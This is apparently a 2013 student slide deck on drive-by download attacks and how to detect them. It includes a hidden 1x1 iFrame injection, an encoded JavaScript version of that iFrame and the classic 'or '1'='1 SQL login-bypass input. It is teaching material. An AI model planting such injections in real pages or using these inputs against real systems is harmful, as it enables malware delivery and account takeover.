This document discusses drive-by downloads and methods for detecting them. Drive-by downloads occur when malicious code is downloaded without a user's consent by visiting an infected website. The document outlines the injection and exploitation mechanisms used, including through iFrames, SQL injections, and exploiting browser/plugin vulnerabilities. It proposes a 4-step generalized detection approach involving analyzing JavaScript redirections, deobfuscating code, detecting memory corruption, and monitoring for exploitation behaviors. Maintaining updated software, using reputable search engines cautiously, and employing web filters are recommended security measures.

1. Drive-By Downloads
Presenter: Darakhshan Naz
Teacher: Professor Dr. Muhammad Mubashir Khan
04.05.2013
1

2. Agenda
 Introduction
 Mechanisms of Drive-by Download
 General Detection Approach
 Security Measures
 Assessment & Conclusion
2

3. What is Drive-by Download?
 A technique that involves
◦ Intended downloads without understanding consequenes
 E.g. Executables
◦ Unintended downloads
 E.g. Virus, spyware
 Can happen by:
◦ Visiting a website
◦ Viewing an email message
 Installs malicious program, termed as Malwares
◦ Through Malwares, attacker gets full or partial control of
victim‘s system
3

4. 4
(2) Read email
Contains a
website link
(3) Attract
user‘s interest
User Click
Website has
many links
(5) Surf every site
but getting bored (no
interest develop)
Close website
User
Attacker
(6) Sends user
a spoofed Email
User‘s browser
(7) Attacker sends malicious code and exploit vulnerability
(8) Malicious code
creates connection
between user and
attacker
(9) Download and install
its backdoor Program
(10) Steal all user‘s important files and
make him compromised over network
Example - Scenario
Drive – By Download !
Source of Concept : Report- Defence against Drive-by Download by National Security Agency US
User is completely
unaware of attack
(4) Go to website(1) Open Browser

5. Purpose of Drive-by Download
• Provide gateway to botnets.
• Take advantages of vulnerabilities.
• Steal personal or confidential information of user.
• Leads or redirects user to other malicious websites
and make him compromised.
5

6. Mechanisms of Drive-by Download
6
Basic Concept of Drive-by Download Attack (Source: [1])
1 2
43
Injection
Exploitation

7. Injection
 What is Injection :
◦ The act of entering data into application by bypassing
security controls and change its behaviour in unexpected
way.
 Reason of Injection :
◦ Existance of vulnerabilities.
 Drive-by Download initates by the injection of
malicious code in database, application or server.
 Ways of Malicious code injection:
◦ Injection through iFrames
◦ SQL Injection
◦ XPATH Injection
7

8. How and where to Inject ?
8Source : http://www.malware-info.com/mal_faq_inject.html
• SQL Injection
• Xpath Injection
Injection through iFrames
Malware placed
directly on
Webserver

9. Injection through iFrames
 The most basic form of injected code is a malicious
iFrame such as:
 Example:
<div style=visibility: hidden; position: absolute: 1; top:1>
<iframe id=IFRAME name=IFRAME
src= http://www.example.com/page_with_malware.htm
scrolling= no width=1 height=1 vspace=0
hspace=0 frameborder=0>
</iframe>
</div>
9
This iFrame is present in the
HTML of a requested web
page
Content from this
source render in an
invisible 1 pixel x 1
pixel window.
Sometimes, iFrames present in encoded form that seems normal.
The process of encoding is known as "obfuscation“.

10. Obfuscation
 The process of disguising code through encoding.
 The previous iFrame can be converted to a JavaScript
Unicode string using any encoding tool.
 Encoding tool: http://www.auditmypc.com/html-
encoder.asp
 On browsing of injected page, the JavaScript
dynamically generates an iframe.
 This causes malicious content from a website controlled
by an attacker to execute inside the requested web
page.
10

11. Obfuscation
 Obfuscated form of iFrame is :
<script
type="text/javascript">document.write('u003Cu0064u0069u0076u0020u0073u00
74u0079u006Cu0065u003Du0076u0069u0073u0069u0062u0069u006Cu006
9u0074u0079u003Au0020u0068u0069u0064u0064u0065u006Eu003Bu0020
u0070u006Fu0073u0069u0074u0069u006Fu006Eu003Au0020u0061u0062u
0073u006Fu006Cu0075u0074u0065u003Au0020u0031u003Bu0020u0074u0
06Fu0070u003Au0031u003Eu0020u0020u0020u0020u0020u0020u0020u00
20u0020u0020u0020u003Cu0069u0066u0072u0061u006Du0065u0020u006
9u0064u003Du0049u0046u0052u0041u004Du0045u0020u006Eu0061u006D
u0065u003Du0049u0046u0052u0041u004Du0045u000Du0020u0020u0020
u0073u0072u0063u003Du0020u0068u0074u0074u0070u003Au002Fu002Fu
0077u0077u0077u002Eu0065u0078u0061u006Du0070u006Cu0065u002Eu0
063u006Fu006Du002Fu0070u0061u0067u0065u005Fu0077u0069u0074u00
68u005Fu006Du0061u006Cu0077u0061u0072u0065u002Eu0068u0074u006
Du000Du0020u0020u0020u0073u0063u0072u006Fu006Cu006Cu0069u006
Eu0067u003Du0020u006Eu006Fu0020u0077u0069u0064u0074u0068u003D
u0031u0020u0068u0065u0069u0067u0068u0074u003Du0031u0020u0076u
0073u0070u0061u0063u0065u003Du0030u000Du0020u0020u0020u0020u0
068u0073u0070u0061u0063u0065u003Du0030u0020u0020u0066u0072u00
61u006Du0065u0062u006Fu0072u0064u0065u0072u003Du0030u003Eu000
Du003Cu002Fu0069u0066u0072u0061u006Du0065u003Eu000Du003Cu002
Fu0064u0069u0076u003Eu000Du000D');</script>
11

12. SQL Injection
 Bypass the authentication process.
 Provide access of data to malicious user or attacker.
 Example : In any userForm page if we enter
Username: 'or‘1‘=‘1 and Password: 'or‘1‘=‘1
then webpage will execute this query form
SELECT * FROM Users
WHERE Username=`1' OR `1' = `1‘
AND Password = `1' OR `1' = `1‘
Parameters have always
logical true condition
Authentication process is validated and attacker can get access to
any account in database.
12

13. XPATH Injection
 Almost similar to SQL Injection.
 Now “target“ is XML Document.
 Insecurity caused by the injection of XPATH query
or conditions through webpage.
 Example :
◦ If any user has an account in any site with Username=John
and Password = test123, then logically he will see his
account only.
• If same user enters his username like John' or 1 = 1 with
same password then system will authenticate him and
show the entire XML document to him.
13

14. Mechanism of Drive-by Download
14
Basic Concept of Drive-by Download Attack (Source: [1])
1 2
43
Injection
Exploitation

15. Exploitation
 What is Exploitation :
◦ The act by an attacker to perform activities on victim‘s system
on his own wish after getting full or partial control.
 Reason of Exploitation:
◦ Ignore the updating of installed applications.
◦ According to Secunia PSI, about 95.46% users have one or
more insecure applications.
◦ Newer version may correct one or more vulnerabilities in the
installed application.
 Vulnerabilities that are mostly exploited :
◦ Browser Vulnerability.
◦ Plugin Vulnerability.
◦ File Format Vulnerability.
15

16. Types of Vulnerabilities
 Browser Vulnerability
◦ Attacker injects malicious code into user‘s browser and
changes its setting without his knowledge.
 Plugin Vulnerability
◦ Plugin is provided by third parties that can be vulnerable;
may lead to buffer overflows, memory corruption issues
and pointer overwrites.
 File Format Vulnerability
◦ Attackers attach malware to Word, Excel or PDF files,
distributed through email or websites. Exploit will occur
when editing program opens them.
16

17. General Detection Approach
 Javascript-script based malwares seems difficult to
detect and analyze.
 Requires a comprehensive approach to detect both root
cause and dynamic behaviour.
 Specialized Detection Methods:
◦ CUJO[2]
 Static + Dynamic analysis of Javascript
 Detection through machine learning
◦ ARROW[8].
 Create Regular Expression Signatures for servers of MDN.
 Evaluate their effectiveness.
Here the generalized detection approach will be
discussed which is the basic idea to detect.
17

18. Step1: Analysis of JS Redirection
 For an effective detection approach, analysis of
JavaScript is mandatory.
• User is victimized in two ways:
• Either he may directly expose to vulnerable site.
• Or an attacker reaches to him through a series of
redirections.
 Two approaches can be taken to investigate
redirections.
◦ Implementing some settings into JavaScript code (e.g:
document.location).
◦ Taking Browser‘s history.
18

19. Step2: JavaScript Deobfuscation
 Most of the malicious JavaScript is in obfuscated
(encoded) form.
 Deobfuscation (conversion from complex form to
simple form) can help to identify malicious code.
 It is possible through manually or any automated
tool.
 Automated Tools : e.g:
◦ Development Tool in Google Chrome.
◦ Microsoft Script Debugger or Editor.
19

20. Step3: Detection of Memory Corruption
 Most attacks corrupt the memory.
 Attacker tries to enter into browser and run his
shellcode.
◦ A shellcode is a small code through which attacker gets
control of victim‘s system.
• Attacker then uses JavaScript to allocate large number
of strings for the shellcode.
• These strings are not the part of real code but for
memory allocation by the attacker.
• Detection of these strings can give the indication of
shellcode. 20

21. Contd.
 Detection of these strings can be done through two
ways:
◦ Controlling and maintaining of string variables whenever
they are created.
◦ For automated detection, libemu library is used.
 It searches from each character and when it finds a sequence
of valid instructions, it reports shellcode.
21

22. Step4: Investigation of Exploitation
 Exploitation is last step of Drive-by Download
attack that take advantage of vulnerabilities.
 It can be detected through two ways :
◦ Analysis of behaviours of Browsers and Plug-ins
◦ Monitoring of string passing as parameters and method
calls. Usually long strings are used in exploits and certain
methods are called in malware downloading.
22

23. Security Measures
 Updation of softwares.
 Installation of web-filtering softwares.
 Implementation of BLADE(Block All Drive-by
Download Exploits).
 Proper management by Network Administrators.
 Users should be careful while visiting sites
specially entertainment and social sites as they
may have Adversaries.
 Usage of reputed search engines like
Google, Microsoft, Yahoo, AVG or Bing.
 Usage of Virtual Machine for Web Browsing.
23

24. The Good
 Automated techniques (compiler or library) of
deobfuscation is really helpful for the identification of
malicious JavaScript.
 Detection should be focussed on central points.
◦ Evilseed[11] provides a crawling approach focussing on
central points of Malware.
 Machine Learning can provide light weight Javascript
analysis, fast detection mechanisms and handling of
vulnerabilities in runtime.
 Proper input validations can reduce SQL and XPATH
injection.
24

25. The Bad
 Can easily happen but very hard to overcome.
 Possibilities of attack are rapidly increasing but
validity of detection approaches is not possible
every time.
 Defensive approach is better to fight against these
attacks because of two reasons :
◦ Intense Dynamic behaviour.
◦ Complex and time consuming detection approaches.
25

26. The Ugly
 Mostly show unexpected behaviour.
 Due to diversity of different ways of attack, it has
high ratio of victims and it is difficult to design a
detection approach that covers all possibilities.
 Not any computing device seems to be safe from
Drive-by Download.
 As Drive-by Download attack is increasing
enormously, perhaps in near future, hard drives or
portable device vulnerabilities may also exist.
26

27. Thanks for your attention
27

28. References(1)
[1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers
against Drive-by Downloads: Mitigating Heap-Spraying Code
Injection Attacks (2009).
[2] Rieck, K., Krueger, T., Dewald, A.: CUJO-Ecient Detection
and Prevention of Drive-by Download Attacks, Tecnische
Universitaet Berlin.
[3] Stone-Gross, B., Cova M. , Kruegel, C. , Vigna, G.: Peering
through the iFrame University of California, University of
Birmingham.
[4] Westervelt, R.: Kaspersky website hacked (February 2009).
[5] Cova, M. , Kruegel, C., Vigna G.: Detection and Analysis of
Drive-by-Download Attacks andMalicious Javascript Code
University of California, Santa Barbara From ACM digital library.
[6] Interesting statistics from the Secunia PSI (January 2008)
http://secunia.com/blog/18.
28

29. References(2)
[7] Luy, L., Yegneswaranz, V., Porrasz, P.: BLADE: An Attack-
Agnostic Approach for Preventing Drive-By Malware Infections
College of Computing, Georgia Institute of Technology, SRI
International From ACM digital library.
[8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W. : ARROW:
Generating Signatures to Detect Drive-By Downloads Georgia
Institute of Technology, Microsoft Bing, Microsoft Research
[9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web
Browsers Indian Institute of Technology, Guwahati, India.
[10] Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.:
All your Iframes point to us Google Inc., Johns Hopkins
University.
[11]
Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P., M., Krueg
el, C., Vigna,G.:EVILSEED: A Guided Approach to Finding
MaliciousWeb Pages, 2012 IEEE Symposium on Security and
Privacy 29